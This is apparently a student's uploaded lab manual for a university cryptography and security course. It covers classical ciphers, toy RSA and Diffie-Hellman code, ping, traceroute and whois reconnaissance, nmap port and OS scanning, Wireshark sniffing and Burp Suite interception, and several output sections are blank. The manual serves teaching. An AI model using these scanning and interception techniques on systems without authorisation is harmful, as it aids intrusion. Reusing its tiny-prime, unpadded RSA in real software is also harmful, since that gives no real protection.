CSS-Lab

Uploaded by

irin.solomon
Nss Paper – I (University of Mumbai)

Downloaded by Irin Solomon
Experiment no.1: Design and implementation of a product cipher using Substitution and Transposition
Cipher

Learning Objective: Student should be able to design and implement a product cipher using
Substitution and Transposition Cipher.

Tools: C/C++/Java/Python or any computational software

Theory:

A substitution cipher is a method of encoding by which units of plaintext are replaced with ciphertext,
according to a fixed system; the "units" may be single letters (the most common), pairs of letters,
triplets of letters, mixtures of the above, and so forth. The receiver deciphers the text by performing
the inverse substitution.
There are a number of different types of substitution cipher. If the cipher operates on single letters, it
is termed a simple substitution cipher; a cipher that operates on larger groups of letters is
termed polyalphabetic. A monoalphabetic cipher uses fixed substitution over the entire message,
whereas a polyalphabetic cipher uses a number of substitutions at different positions in the message,
where a unit from the plaintext is mapped to one of several possibilities in the ciphertext and vice
versa.
The function for the Additive/Shift/Generalized Caesar Cipher is given as follows:

• It can use any shift k from 1 to 25, i.e., replace each letter by the letter a fixed distance away.
• Ci = E(Pi) = (Pi + k) mod 26 and Pi = D(Ci) = (Ci - k) mod 26.

In cryptography, a Caesar Cipher, also known as Caesar's Cipher, the Shift Cipher, Caesar's
Code or Caesar Shift, is one of the simplest and most widely known encryption techniques. It is a type
of substitution cipher in which each letter in the plaintext is replaced by a letter some fixed number of
positions down the alphabet. For example, with a shift of 3, A would be replaced by D, E would
become H, and so on. The method is named after Julius Caesar, who used it in his private
correspondence.

The function for the Caesar Cipher is defined as follows:

• Ci = E(Pi) = (Pi + 3) mod 26.
• Pi = D(Ci) = (Ci - 3) mod 26.
• Example:
  Plain Text:  ABCDEFGHIJKLMNOPQRSTUVWXYZ
  Cipher Text: DEFGHIJKLMNOPQRSTUVWXYZABC

Substitution ciphers can be compared with transposition ciphers. In a transposition cipher, the units of
the plaintext are rearranged in a different and usually quite complex order, but the units themselves
are left unchanged. By contrast, in a substitution cipher, the units of the plaintext are retained in the
same sequence in the ciphertext, but the units themselves are altered.

A transposition cipher is a method of encryption by which the positions held by units
of plaintext (which are commonly characters or groups of characters) are shifted according to a
regular system, so that the ciphertext constitutes a permutation of the plaintext. That is, the order of
the units is changed (the plaintext is reordered). Mathematically a bijective function is used on the
characters' positions to encrypt and an inverse function to decrypt.

A transposition cipher does not substitute one symbol for another; instead it changes the location of
the symbols.

A symbol in the first position of the plaintext may appear in the tenth position of the ciphertext. A
symbol in the eighth position in the plaintext may appear in the first position of the ciphertext. A
transposition cipher reorders (transposes) the symbols. Simple transposition ciphers, which were
used in the past, are keyless.

There are two methods for permutation of characters. In the first method, the text is written into a
table column by column and then transmitted row by row. In the second method, the text is written
into a table row by row and then transmitted column by column.

Method I-

Method II-
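The product cipher this experiment describes, as an added example (not code from the lab manual): affine substitution (C = (P*k1 + k2) mod 26, the form named in this experiment's conclusion) followed by keyless transposition Method I (write column by column, read row by row), with the inverse of each step. The key values, the message and the rule of padding a short last column with X are assumptions made for the example.

```python
from math import gcd

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"


def affine_encrypt(plaintext, k1, k2):
    """Substitution step: C = (P*k1 + k2) mod 26 for each letter.
    k1 must be coprime with 26, otherwise the mapping is not invertible."""
    if gcd(k1, 26) != 1:
        raise ValueError("k1 must be coprime with 26")
    out = []
    for ch in plaintext.upper():
        if ch in ALPHABET:
            p = ALPHABET.index(ch)
            out.append(ALPHABET[(p * k1 + k2) % 26])
        # non-letters (spaces, digits) are dropped, as in the classical scheme
    return "".join(out)


def affine_decrypt(ciphertext, k1, k2):
    """Inverse substitution: P = k1^-1 * (C - k2) mod 26."""
    k1_inv = pow(k1, -1, 26)          # modular inverse (Python 3.8+)
    return "".join(ALPHABET[((ALPHABET.index(c) - k2) * k1_inv) % 26]
                   for c in ciphertext)


def transpose_method1(text, rows):
    """Keyless transposition, Method I: write the text column by column into a
    table with `rows` rows, then transmit it row by row.
    Assumption: a short last column is padded with X."""
    if len(text) % rows:
        text += "X" * (rows - len(text) % rows)
    cols = len(text) // rows
    table = [[""] * cols for _ in range(rows)]
    for idx, ch in enumerate(text):
        table[idx % rows][idx // rows] = ch          # column-major fill
    return "".join("".join(row) for row in table)    # row-major read-out


def untranspose_method1(text, rows):
    """Inverse of Method I: the ciphertext is the table read row by row,
    so rebuild the rows and read it back column by column."""
    cols = len(text) // rows
    table = [text[r * cols:(r + 1) * cols] for r in range(rows)]
    return "".join(table[r][c] for c in range(cols) for r in range(rows))


def product_encrypt(plaintext, k1, k2, rows):
    """Product cipher: substitution first, then transposition."""
    return transpose_method1(affine_encrypt(plaintext, k1, k2), rows)


def product_decrypt(ciphertext, k1, k2, rows):
    """Undo the steps in reverse order. Trailing X padding is stripped, which
    also removes a genuine trailing X: a known ambiguity of this padding rule."""
    return affine_decrypt(untranspose_method1(ciphertext, rows), k1, k2).rstrip("X")


if __name__ == "__main__":
    ct = product_encrypt("ATTACK AT DAWN", 5, 8, 3)
    print("cipher text:", ct)
    print("recovered  :", product_decrypt(ct, 5, 8, 3))
```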

Cipher Text:

Source Code:

Substitution Cipher (Affine Cipher):

Transposition Cipher:

Output:

1. Affine Cipher

2. Transposition cipher

Applications:

1. Ciphers enable private communication in many different networking protocols.

2. The most common application of cipher techniques is encrypting and decrypting
emails and other plaintext.

Result and Discussion:


In this Experiment, we implemented Substitution Cipher and Transposition Cipher
algorithms in Python. We implemented an Affine Substitution Cipher and got the expected
encrypted text. Also, for the Transposition cipher, we implemented the Keyless Transposition
Cipher Method 1 algorithm to encrypt the text and got the desired output.

Learning Outcomes: The student should have the ability to design & implement a product
cipher using Substitution and Transposition Cipher

LO1: To describe & understand Substitution and Transposition cipher techniques

LO2: To implement Substitution and Transposition cipher techniques

Course Outcomes: Upon completion of the course students will be able to understand & implement
Substitution and Transposition Cipher.

Conclusion :

After performing this Experiment, we understood how to implement substitution and
transposition ciphers. We learned various Substitution and Transposition Cipher
techniques. In this Experiment, we implemented the Affine Cipher, i.e. (P*k1 + k2) mod 26, and
keyless transposition Method 1.

For Faculty Use

Parameters     | Correction [40%] | Formative Assessment [40%] | Timely completion of Practical | Attendance / Learning Attitude [20%]
Marks Obtained |                  |                            |                                |

Experiment no.2: Study the use of network reconnaissance tools/commands like ping,
traceroute, whois, etc. to gather information about networks and domain registrars

Learning Objective: Student should be able to understand network information
discovery and the various basic network commands used to gather network information.

Tools: Networking Commands

Theory:

Reconnaissance is a set of processes and techniques used to covertly discover and
collect information about a target system. During reconnaissance, an ethical hacker attempts
to gather as much information about a target system as possible.
Active reconnaissance is a type of computer attack in which an intruder engages with the
targeted system to gather information about vulnerabilities. This may be through automated
scanning or manual testing using various tools like ping, traceroute and netcat; because it
sends traffic to the target, it can be noticed by the target's defences (intrusion detection
systems, network firewalls, etc.).
When one is conducting passive reconnaissance, one is not interacting directly with the
target and as such, the target has no way of knowing, recording, or logging the
activity. The reconnaissance is aimed at collecting as much information as possible on a
target.
Some of the networking commands used to gather information:
1. Ping:
Ping is a basic Internet program that allows a user to verify that a particular IP address exists
and can accept requests. Ping is used diagnostically to ensure that a host computer the user is
trying to reach is actually operating. Ping works by sending an Internet Control Message
Protocol (ICMP) Echo Request to a specified interface on the network and waiting for a
reply. Ping can be used for troubleshooting to test connectivity and determine response time.

2. Traceroute:
Traceroute prints the route that packets take to a network host. The traceroute utility uses the
TTL field in the IP header to achieve its operation. The TTL field describes how many hops
a particular packet may take while travelling on the network, so it effectively limits the
lifetime of the packet on the network. This field is usually set to 32 or 64. Each time the packet is
handled by an intermediate router, the router decreases the TTL value by 1. When a router finds a TTL
value of 1 in a received packet, that packet is not forwarded but discarded. After
discarding the packet, the router sends an ICMP "Time exceeded" error message back to the
source from which the packet originated. The ICMP packet that is sent back contains the IP
address of the router. So traceroute operates by sending
packets with a TTL value starting from 1 and incrementing it by one each time. Each time a
router receives the packet, it checks the TTL field; if the TTL field is 1, it discards the packet
and sends the ICMP error packet containing its IP address. So traceroute incrementally
collects the IP addresses of all the routers between the source and the destination.

3. Nslookup: The nslookup command is used to query internet name servers interactively for
information. nslookup, which stands for "name server lookup", is a useful tool for finding out
information about a domain name. By default, nslookup will translate a domain name to an IP
address (or vice versa).

4. WHOIS: WHOIS is the Linux utility for searching an object in a WHOIS database. The
WHOIS database of a domain is the publicly displayed information about a domain's
ownership, billing, technical, administrative, and nameserver information. Running a WHOIS
on your domain will look the domain up at the registrar for the domain information. All
domains have WHOIS information. The WHOIS database can be queried to obtain the following
information:
• Administrative contact details, including names, email addresses, and telephone numbers
• Mailing addresses for office locations related to the target organization
• Details of authoritative name servers for each given domain
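The TTL mechanism described under Traceroute above, as an added example (not part of the lab manual): a small model of the probe/reply exchange in which each router decrements the TTL and answers with ICMP Time Exceeded when the packet arrives with TTL 1. The router addresses are constructed; a None entry stands for a router that silently drops the expired probe, which real traceroute shows as *.

```python
# Constructed topology: the routers between the source and the destination, in order.
# None models a router that drops expired packets without sending ICMP Time Exceeded.
PATH = ["192.0.2.1", "198.51.100.7", None, "203.0.113.9"]
DESTINATION = "203.0.113.50"


def send_probe(ttl, path, destination):
    """Forward one probe along the path, decrementing TTL at each router.

    Returns ("time_exceeded", router_ip) when a router discards the probe and
    reports it, ("timeout", None) when the discarding router stays silent, or
    ("reply", destination) when the probe survives every router."""
    for router in path:
        if ttl == 1:                       # a router does not forward a packet with TTL 1
            if router is None:
                return ("timeout", None)   # no ICMP error message comes back
            return ("time_exceeded", router)
        ttl -= 1                           # router decrements TTL and forwards
    return ("reply", destination)          # destination answers the probe itself


def traceroute(path, destination, max_hops=30):
    """Send probes with TTL 1, 2, 3, ... and record who answered at each hop.
    Stops when the destination replies or max_hops is reached."""
    hops = []
    for ttl in range(1, max_hops + 1):
        kind, addr = send_probe(ttl, path, destination)
        hops.append(addr if addr is not None else "*")
        if kind == "reply":
            break
    return hops


if __name__ == "__main__":
    for hop_no, addr in enumerate(traceroute(PATH, DESTINATION), start=1):
        print(f"{hop_no:2d}  {addr}")
```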

Output:

Result and Discussion:
1. Ping - This command allows you to test the reachability of a device on a network.
Pinging a host should return four data packets if no network anomaly is present.
2. hostname - This command returns the name of the host.
3. getmac - A user can determine the MAC address of their various network devices
using this command.
4. arp – Displays entries in the Address Resolution Protocol (ARP) cache, which
contains one or more tables that are used to store IP addresses and their resolved
physical addresses.
5. nslookup - The NSLookUp Windows 10 network command displays information that
you can use to diagnose Domain Name System (DNS) infrastructure. Using
NSLookUp without a parameter will show the DNS server your PC is currently using
to resolve domain names into IP addresses.
6. tracert - This command will trace the route a data packet takes before reaching its
destination, displaying information on each hop along the route. Each hop of the route
will display the latency between your device and that particular hop and the IP
address of the hop.
7. ipconfig - The IPConfig command displays basic IP address configuration
information for the current host.
8. netstat - The Netstat command displays active TCP connections, ports on which the
computer is listening.

Learning Outcomes: The student will be able to

LO1: Understand the use of network reconnaissance tools


LO2: Apply basic network commands to gather basic network information.

Course Outcomes: Upon completion of the course students will be able to study the various
network reconnaissance tools & how to use them to gather primary network information.

Conclusion:
In this experiment we used various network commands to gather information about the network
the host is present in and learned to read and understand their outputs.

For Faculty Use

Parameters     | Correction [40%] | Formative Assessment [40%] | Timely completion of Practical | Attendance / Learning Attitude [20%]
Marks Obtained |                  |                            |                                |

Experiment no.3: Analyze the tool nmap and use it with different options to scan open ports,
perform OS fingerprinting, do a ping scan, tcp port scan, udp port scan,
xmas scan etc

Learning Objective: Student should be able to:

• Download, install & use the nmap tool
• Understand port scanning
• Understand how nmap helps to scan various ports
• Explore various nmap options for OS fingerprinting and gathering detailed network and
  remote host information

Tools: nmap tool

Theory:

Nmap (Network Mapper) is a security scanner originally written by Gordon Lyon (also known by
his pseudonym Fyodor Vaskovich) used to discover hosts and services on a computer network,
thus creating a "map" of the network. To accomplish its goal, Nmap sends specially crafted
packets to the target host and then analyses the responses. Unlike many simple port scanners that
just send packets at some predefined constant rate, Nmap accounts for the network conditions
(latency fluctuations, network congestion, the target interference with the scan) during the run.
Also, owing to the large and active user community providing feedback and contributing to its
features, Nmap has been able to extend its discovery capabilities beyond simply figuring out
whether a host is up or down and which ports are open and closed; it can determine the operating
system of the target, names and versions of the listening services, estimated uptime, type of
device, and presence of a firewall.

Nmap features include:


Host Discovery – Identifying hosts on a network. For example, listing the hosts which respond
to pings or have a particular port open.

Port Scanning – Enumerating the open ports on one or more target hosts.

Version Detection – Interrogating network services listening on remote devices to
determine the application name and version number.

OS Detection – Remotely determining the operating system and some hardware characteristics of
network devices.
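Since the scan output for this experiment is not reproduced here, the following added example (not part of the lab manual) parses nmap's grepable output format (-oG) into a host and port inventory, the kind of record a defender keeps to spot unexpected open services after a scan of their own network. The scan output is a constructed sample; addresses, hostnames and service banners are invented.

```python
import re
from collections import defaultdict

# Constructed sample of nmap "grepable" output (-oG). Sections on a Host line are
# tab-separated; each Ports entry is port/state/proto/owner/service/rpc/version/.
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated Mon Jan  1 10:00:00 2024 as: nmap -sS -sU -sV -oG lab.gnmap 192.168.56.0/24
Host: 192.168.56.1 ()\tStatus: Up
Host: 192.168.56.1 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1/, 80/open/tcp//http//nginx 1.18.0/\tIgnored State: closed (998)
Host: 192.168.56.20 (files.lab)\tStatus: Up
Host: 192.168.56.20 (files.lab)\tPorts: 21/open/tcp//ftp//vsftpd 3.0.3/, 139/filtered/tcp//netbios-ssn///, 161/open/udp//snmp//SNMPv1 server/\tIgnored State: closed (997)
# Nmap done at Mon Jan  1 10:02:13 2024 -- 256 IP addresses (2 hosts up) scanned in 133.01 seconds
"""

HOST_RE = re.compile(r"^Host: (\S+) \(([^)]*)\)")


def parse_ports_field(field):
    """Turn '22/open/tcp//ssh//OpenSSH 8.9p1/, ...' into a list of port dicts."""
    ports = []
    for entry in field.split(", "):
        parts = entry.split("/")
        if len(parts) < 7:
            continue                 # malformed entry: skip rather than crash
        ports.append({
            "port": int(parts[0]),
            "state": parts[1],
            "proto": parts[2],
            "service": parts[4],
            "version": parts[6],
        })
    return ports


def parse_gnmap(text):
    """Return {ip: {"hostname": str, "status": str, "ports": [...]}} from -oG output."""
    hosts = defaultdict(lambda: {"hostname": "", "status": "", "ports": []})
    for line in text.splitlines():
        if line.startswith("#") or not line.strip():
            continue                 # header and summary lines carry no host data
        m = HOST_RE.match(line)
        if not m:
            continue
        ip, hostname = m.group(1), m.group(2)
        rec = hosts[ip]
        rec["hostname"] = hostname
        for section in line.split("\t")[1:]:      # sections after the Host: field
            key, _, value = section.partition(": ")
            if key == "Status":
                rec["status"] = value
            elif key == "Ports":
                rec["ports"].extend(parse_ports_field(value))
    return dict(hosts)


def open_ports(hosts, proto=None):
    """Flat inventory of (ip, port, proto, service, version) for open ports,
    optionally limited to one protocol ('tcp' or 'udp')."""
    rows = []
    for ip, rec in sorted(hosts.items()):
        for p in rec["ports"]:
            if p["state"] == "open" and (proto is None or p["proto"] == proto):
                rows.append((ip, p["port"], p["proto"], p["service"], p["version"]))
    return rows


if __name__ == "__main__":
    for row in open_ports(parse_gnmap(SAMPLE_GNMAP)):
        print("%-15s %5d/%-4s %-12s %s" % row)
```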

Learning Outcomes: The student should have the ability to install and use nmap

LO1: To understand and explore about nmap tool

LO2: To use nmap tool for gathering detailed network information

Course Outcomes: Upon completion of the course students will be able to install and use
nmap and use it for gathering detailed network and remote host information

Conclusion:

In this experiment we learned about the NMAP network tool and its various use cases. We
executed a number of NMAP commands such as a network scan for active hosts, OS
fingerprinting, services and applications detection along with their versions on a target host as
well as a port scan to find open ports for TCP or UDP connection in order to exploit any
potential vulnerabilities.

*Mention key points wrt nmap tool

For Faculty Use

Parameters     | Correction [40%] | Formative Assessment [40%] | Timely completion of Practical | Attendance / Learning Attitude [20%]
Marks Obtained |                  |                            |                                |

Experiment no.4: Write a program to implement RSA algorithm

Learning Objective: Student should be able to implement RSA Algorithm

Tools: C/C++/Java/Python or any computational software

Theory:

In cryptography, RSA (which stands for Rivest, Shamir and Adleman who first publicly
described it) is an algorithm for public-key cryptography. It is the first algorithm known to
be suitable for signing as well as encryption, and was one of the first great advances in
public key cryptography. RSA is widely used in electronic commerce protocols, and is
believed to be sufficiently secure given sufficiently long keys and the use of up-to-date
implementations.

KEY GENERATION:

The RSA algorithm involves three steps: key generation, encryption and decryption.

RSA involves a public key and a private key. The public key can be known to everyone and
is used for encrypting messages. Messages encrypted with the public key can only be
decrypted using the private key. The keys for the RSA algorithm are generated the following
way:

1. Choose two distinct prime numbers p and q.
   • For security purposes, the integers p and q should be chosen at random, and
     should be of similar bit-length. Prime integers can be efficiently found using
     a primality test.

2. Compute n = pq.
   • n is used as the modulus for both the public and private keys.

3. Compute φ(n) = (p–1)(q–1), where φ is Euler's totient function.

4. Choose an integer e such that 1 < e < φ(n) and gcd(e, φ(n)) = 1, i.e. e and φ(n)
   are coprime.
   • e is released as the public key exponent.

5. Determine d = e^(-1) mod φ(n); i.e. d is the multiplicative inverse of e mod φ(n).
   • This is more clearly stated as: solve for d given (d*e) mod φ(n) = 1.
   • This is often computed using the extended Euclidean algorithm.
   • d is kept as the private key exponent.

6. The public key consists of the modulus n and the public (or encryption) exponent e.
   The private key consists of the private (or decryption) exponent d which must be kept
   secret.
   • Public Key {e, n}.
   • Private Key {d, n}.

ENCRYPTION:

Alice transmits her public key (n,e) to Bob and keeps the private key secret. Bob then wishes to
send message M to Alice.

He first turns M into an integer m, such that 0 < m < n, by using an agreed-upon reversible
protocol known as a padding scheme. He then computes the ciphertext c corresponding to

c = m^e (mod n).

This can be done quickly using the method of exponentiation by squaring. Bob then transmits c
to Alice.

DECRYPTION:

Alice can recover m from c by using her private key exponent d via computing

m = c^d (mod n).

Source Code:

import math
import random


def modInverse(a, m):
    # Extended Euclidean algorithm: returns x such that (a * x) % m == 1.
    m0 = m
    y = 0
    x = 1
    if m == 1:
        return 0
    while a > 1:
        q = a // m            # quotient
        t = m
        m = a % m             # m becomes the remainder
        a = t
        t = y
        y = x - q * y         # update the Bezout coefficients
        x = t
    if x < 0:
        x = x + m0            # make the inverse positive
    return x


def check_prime(n):
    # Trial division up to sqrt(n). The original bound range(2, n//2) is empty
    # for n = 4, so 4 was wrongly accepted as a prime.
    if n < 2:
        return False
    for i in range(2, int(n ** 0.5) + 1):
        if n % i == 0:
            return False
    return True


prime_list = [i for i in range(2, 150) if check_prime(i)]
p = prime_list[random.randint(0, len(prime_list) - 1)]
flag = 0
m = input("Enter the message to be encrypted : ")
try:
    m = int(m)
except ValueError:
    m = m.upper()             # upper-case letters have two-digit ASCII codes
if type(m) != int:
    flag = 1
    Ascii_conversion = ""
    for char in m:
        Ascii_conversion += str(ord(char))
    m = int(Ascii_conversion)

# Choose q as the first prime different from p with p*q > m, so that m < n.
# (q == p would give n = p*p and a wrong phi(n), so it is skipped.)
# This search is only practical for short messages, because m grows with length.
q = 0
i = 2
while q == 0:
    if check_prime(i) and i != p:
        if (p * i) > int(m):
            q = i
            break
    i += 1
n = p * q
n2 = (p - 1) * (q - 1)        # phi(n)
e = 2
while math.gcd(e, n2) != 1:
    e += 1
d = modInverse(e, n2)
print("Public Key Pair : ({},{})".format(e, n))
print("Private Key Pair : ({},{})".format(d, n))


def res(e, n):
    encrypted_msg = pow(m, e, n)              # modular exponentiation, not m**e % n
    print("Encrypted message :", encrypted_msg)
    decrypted_msg = pow(encrypted_msg, d, n)
    if flag == 1:
        Decrypted_Ascii = str(decrypted_msg)
        Decrypted_Text = ""
        for i in range(0, len(Decrypted_Ascii), 2):   # two digits per character
            Decrypted_Text += chr(int(Decrypted_Ascii[i] + Decrypted_Ascii[i + 1]))
        print("Decrypted message :", Decrypted_Text)
    else:
        print("Decrypted message :", decrypted_msg)


res(e, n)

Output:

Applications:

1. RSA algorithm is commonly used by banks to protect their data, like customer
information and transaction records. Some scenarios are credit cards and office computers.

2. RSA algorithm is useful to encrypt the call data as a concern for privacy issues because
it is Asymmetrical Encryption Algorithm.

Result and Discussion:


In this Experiment, we implemented the RSA algorithm in Python. We learned the algorithm and
its working. We learned how the selection of p and q, the two large prime numbers, plays a major
role in encryption of data. We got the desired output after implementing this algorithm.

Learning Outcomes: The student should have the ability to understand RSA Algorithm

LO1: To describe & understand the RSA Algorithm

LO2: To implement RSA Algorithm

Course Outcomes: Upon completion of the course students will be able to understand &
implement RSA Algorithm

Conclusion: We learned the RSA algorithm in detail and understood how RSA overcomes
the weaknesses of symmetrical algorithms in authenticity and confidentiality of data. Since
RSA is an asymmetrical algorithm, it uses two keys, i.e. a public key and a private key. RSA is
stronger than any symmetrical algorithm but it requires more computation.

For Faculty Use

Parameters     | Correction [40%] | Formative Assessment [40%] | Timely completion of Practical | Attendance / Learning Attitude [20%]
Marks Obtained |                  |                            |                                |

Experiment no.5

Learning Objective: Analyze and implement Diffie-Hellman Key Exchange Algorithm


Tools: C/C++/Java/Python
Theory: DIFFIE–HELLMAN KEY EXCHANGE:

Diffie–Hellman key exchange (D–H) is a specific method of exchanging keys. It is one of


the earliest practical examples of key exchange implemented within the field of
cryptography. The Diffie–Hellman key exchange method allows two parties that have no
prior knowledge of each other to jointly establish a shared secret key over an insecure
communications channel. This key can then be used to encrypt subsequent communications
using a symmetric key cipher.

The Diffie–Hellman key agreement was invented in 1976 during a collaboration between
Whitfield Diffie and Martin Hellman and was the first practical method for establishing
a shared secret over an unprotected communication channel.

Diffie–Hellman establishes a shared secret that can be used for secret communications by
exchanging data over a public network.

STEP 1: GLOBAL PUBLIC ELEMENTS:
Firstly, Alice and Bob agree on two large prime numbers, n and g. These two integers need
not be kept secret. Alice and Bob can use an insecure channel to agree on them.

STEP 2: ASYMMETRIC KEY GENERATION BY USER 'A':

Alice chooses another large random number X and calculates the public key, A, such that:

A = g^X mod n

STEP 3: Alice sends the number A to Bob.

STEP 4: KEY GENERATION BY USER 'B':

Bob independently chooses another large random number Y and calculates the public key,
B, such that:

B = g^Y mod n

STEP 5: Bob sends the number B to Alice.

STEP 6: SYMMETRIC KEY (K) GENERATION BY USER 'A':

Alice now computes the secret key, K1, as follows:

K1 = B^X mod n

STEP 7: SYMMETRIC KEY (K) GENERATION BY USER 'B':

Bob now computes the secret key, K2, as follows:

K2 = A^Y mod n

NOTE:

It should be difficult for Alice to solve for Bob's private key or for Bob to solve for Alice's
private key. If it is not difficult for Alice to solve for Bob's private key (or vice versa), Eve
may simply substitute her own private/public key pair, plug Bob's public key into her
private key, produce a fake shared secret key, and solve for Bob's private key (and use that to
solve for the shared secret key). Eve may attempt to choose a public/private key pair that
will make it easy for her to solve for Bob's private key.

CODE:

def diffie_hellman(n, g, x, y):
    # A and B are the values exchanged in the clear; k1 and k2 are the keys
    # each side derives. pow(base, exp, mod) does modular exponentiation
    # without building g**x in full.
    A = pow(g, x, n)
    B = pow(g, y, n)
    k1 = pow(B, x, n)      # computed by Alice from Bob's public value
    k2 = pow(A, y, n)      # computed by Bob from Alice's public value
    return A, B, k1, k2


n = int(input("Enter 1st prime number : "))
g = int(input("enter 2nd prime number : "))
x = int(input("Enter 1st Secret Key : "))
y = int(input("Enter 2nd Secret Key : "))
A, B, k1, k2 = diffie_hellman(n, g, x, y)
print("key generated ")
print("k1 : ", k1)
print("k2 : ", k2)
print("k1 : {} === k2 : {}".format(k1, k2))

OUTPUT :

Result and Discussion:

In this Experiment, we implemented the Diffie-Hellman Algorithm for key exchange
between two users. We got the desired output from the algorithm after exchanging keys, i.e.
K1 == K2.

Learning Outcomes: The student will be able to

LO1: Understand the Diffie-Hellman Key Exchange Algorithm


LO2: Analyze and implement the Diffie-Hellman Key Exchange Algorithm

Course Outcomes: Upon completion of the course students will be able to analyze and
implement Diffie-Hellman Key Exchange Algorithm for generation of shared symmetric key

Conclusion: After performing this Experiment, we understood the Diffie-Hellman Key
Exchange Algorithm in detail. We learned how an attacker can alter the messages and may alter
the communication between two users if their private keys are easy to solve.

For Faculty Use

Parameters     | Correction [40%] | Formative Assessment [40%] | Timely completion of Practical | Attendance / Learning Attitude [20%]
Marks Obtained |                  |                            |                                |

Experiment no.6

Aim: Study of packet sniffer tools: Wireshark

Download and install wireshark and capture icmp, tcp, and http packets in promiscuous mode
and explore how the packets can be traced based on different filters.

Objectives:
• Understand the need for traffic analysis.
• Understand how packet sniffing is done using wireshark.
• Trace and understand various packets from dynamic traffic.

Outcomes: The learner will be able to
• Sniff network packets and study insights of packets to get detailed network information.

Hardware / Software Required: Unix/Linux/Windows, wireshark

Theory:

Wireshark, a network analysis tool formerly known as Ethereal, captures packets in real time
and displays them in human-readable format. Wireshark includes filters, color-coding and
other features that let you dig deep into network traffic and inspect individual packets.

Features of Wireshark:

• Available for UNIX and Windows.
• Capture live packet data from a network interface.
• Open files containing packet data captured with tcpdump/WinDump, Wireshark, and a
  number of other packet capture programs.
• Import packets from text files containing hex dumps of packet data.
• Display packets with very detailed protocol information.
• Export some or all packets in a number of capture file formats.
• Filter packets on many criteria.
• Search for packets on many criteria.
• Colorize packet display based on filters.
• Create various statistics.

Capturing Packets:

After downloading and installing wireshark, you can launch it and click the name of an interface
under Interface List to start capturing packets on that interface. For example, if you want to
capture traffic on the wireless network, click your wireless interface. You can configure
advanced features by clicking Capture Options.

Installation of Wireshark: sudo apt-get install wireshark

As soon as you click the interface's name, you'll see the packets start to appear in real time.
Wireshark captures each packet sent to or from your system. If you're capturing on a wireless
interface and have promiscuous mode enabled in your capture options, you'll also see the
other packets on the network.

Click the stop capture button near the top left corner of the window when you want to stop
capturing traffic.

Wireshark uses colors to help you identify the types of traffic at a glance. By default, green is
TCP traffic, dark blue is DNS traffic, light blue is UDP traffic, and black identifies TCP
packets with problems — for example, they could have been delivered out-of-order.

Filtering Packets:

The most basic way to apply a filter is by typing it into the filter box at the top of the window and
clicking Apply (or pressing Enter). For example, type "dns" and you'll see only DNS
packets. When you start typing, Wireshark will help you autocomplete your filter.
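The filters used in this experiment (ip.addr, ip.src, ip.dst, dns), as an added example that is not part of the lab manual: a small evaluator for that subset of Wireshark's display-filter syntax run over a constructed capture, showing in particular that ip.addr matches either endpoint while ip.src and ip.dst match only one. The packets and addresses are made up; treating "dns" as traffic on port 53 is a simplification of Wireshark's dissector-based protocol filter.

```python
from dataclasses import dataclass


@dataclass
class Packet:
    src: str
    dst: str
    proto: str           # "TCP", "UDP" or "ICMP"
    sport: int = 0
    dport: int = 0


# Constructed capture: a handful of packets like those the experiment's filters select.
CAPTURE = [
    Packet("192.168.0.5", "192.168.0.1", "UDP", 51234, 53),     # DNS query to the router
    Packet("192.168.0.1", "192.168.0.5", "UDP", 53, 51234),     # DNS response
    Packet("192.168.0.5", "93.184.216.34", "TCP", 49152, 80),   # HTTP request
    Packet("93.184.216.34", "192.168.0.5", "TCP", 80, 49152),   # HTTP response
    Packet("192.168.0.1", "192.168.0.5", "ICMP"),               # echo reply from router
]


def matches(pkt, expr):
    """Evaluate a subset of Wireshark display-filter syntax against one packet.

    Supported: ip.addr==X, ip.src==X, ip.dst==X, dns, tcp, udp, icmp,
    combined with && and negated with a leading !. Field names are
    case-sensitive, as in Wireshark, so an unknown name is an error."""
    expr = expr.strip()
    if "&&" in expr:
        return all(matches(pkt, part) for part in expr.split("&&"))
    if expr.startswith("!"):
        return not matches(pkt, expr[1:])
    if "==" in expr:
        field, value = (s.strip() for s in expr.split("==", 1))
        if field == "ip.addr":        # either endpoint: src OR dst
            return value in (pkt.src, pkt.dst)
        if field == "ip.src":
            return pkt.src == value
        if field == "ip.dst":
            return pkt.dst == value
        raise ValueError(f"unsupported field: {field}")
    if expr == "dns":                 # simplification: DNS is what runs on port 53
        return 53 in (pkt.sport, pkt.dport)
    if expr in ("tcp", "udp", "icmp"):
        return pkt.proto.lower() == expr
    raise ValueError(f"unsupported filter: {expr}")


def apply_filter(capture, expr):
    """Return the packets a filter would leave visible in the packet list."""
    return [p for p in capture if matches(p, expr)]


if __name__ == "__main__":
    for f in ("ip.addr==192.168.0.1", "ip.src==192.168.0.1", "ip.dst==192.168.0.1", "dns"):
        print(f"{f:24s} -> {len(apply_filter(CAPTURE, f))} packets")
```

A mis-capitalised field such as Ip.addr raises ValueError here, mirroring the filter bar's rejection of an unknown field name.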

Output:

1. Wireshark Interface (All Packets without Filtering):

2. ip.addr==192.168.0.1:

3. ip.src==192.168.0.1:

4. ip.dst==192.168.0.1:

5. dns:

Learning Outcomes: The student will be able to

LO1: Understand the need for traffic analysis


LO2: Understand how packet sniffing is done using wireshark

Course Outcomes: Upon completion of the course students will be able to download and install
wireshark and capture icmp, tcp, and http packets in promiscuous mode and explore how the
packets can be traced based on different filters

Conclusion: Wireshark installation and network traffic analysis using packet sniffing were done.
Detailed information about packets was explored by applying filters.

For Faculty Use

Parameters     | Correction [40%] | Formative Assessment [40%] | Timely completion of Practical | Attendance / Learning Attitude [20%]
Marks Obtained |                  |                            |                                |

Experiment no. 7

Aim: To perform Web Security Testing

Objectives: To understand about Web Security Testing

Outcomes: The learner will be able to understand Web Security Testing and simulate using
Tools

Hardware / Software Required: Burpsuite

Theory:

Web application security testing is the process of testing, analyzing and reporting on the
security level and/or posture of a Web application. It is used by Web developers and security
administrators to test and gauge the security strength of a Web application using manual and
automated security testing techniques.

Web application security testing is a broad process that includes a multitude of processes that
enable security testing of a Web application. It is a systematic process that starts from
identifying and scoping the entire application, followed by planning multiple tests.

Typically, Web application security testing is performed after the Web application is
developed. The Web application undergoes a rigorous testing process that includes a series of
fabricated malicious attacks to see how well the Web application performs/responds. The
overall security testing process is generally followed by a format report that includes the
identified vulnerabilities, possible threats and recommendations for overcoming the security
shortfalls.

Some of the processes within the testing process include:

• Brute force attack testing
• Password quality rules
• Session cookies
• User authorization processes
• SQL injection

Mention about the Tool used

Output:

Interception :

Interception Turned On :

Interception Turned Off :

Modifying Requests in Burp Proxy :

